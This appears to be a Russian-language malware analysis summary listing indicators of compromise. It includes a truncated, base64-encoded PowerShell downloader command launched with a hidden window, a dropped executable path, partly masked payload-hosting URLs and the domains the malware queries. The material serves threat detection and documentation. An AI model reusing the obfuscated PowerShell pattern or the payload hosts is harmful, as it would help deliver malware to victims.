Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABCAGcANQB0AGoAZQBqAD0AKAAoACcAQQA5ACcAKwAnAGMAJwApACsAKAAnAGIAJwArACcAegBsADQAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABlAE4AdgA6AHUAUwBFAHIAcAByAE8ARgBpAEwARQ...
- %HOMEPATH%\iiqqhqp\w6jsxef\n70wm26e.exe
- %HOMEPATH%\iiqqhqp\w6jsxef\n70wm26e.exe
- %HOMEPATH%\iiqqhqp\w6jsxef\n70wm26e.exe
- http://cr###okuota.com/assets/M2ngTrJ/
- http://4l###.com.vn/wp-admin/R/
- http://ba####business.de/wp-content/pMr/
- DNS ASK cr###okuota.com
- DNS ASK pi####usmedia.com
- DNS ASK as###sino.com
- DNS ASK as###line.com
- DNS ASK du###-homes.ae
- DNS ASK wh##doit.tk
- DNS ASK 4l###.com.vn
- DNS ASK ba####business.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABCAGcANQB0AGoAZQBqAD0AKAAoACcAQQA5ACcAKwAnAGMAJwApACsAKAAnAGIAJwArACcAegBsADQAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABlAE4AdgA6AHUAUwBFAHIAcAByAE8ARgBpAEwARQ...' (со скрытым окном)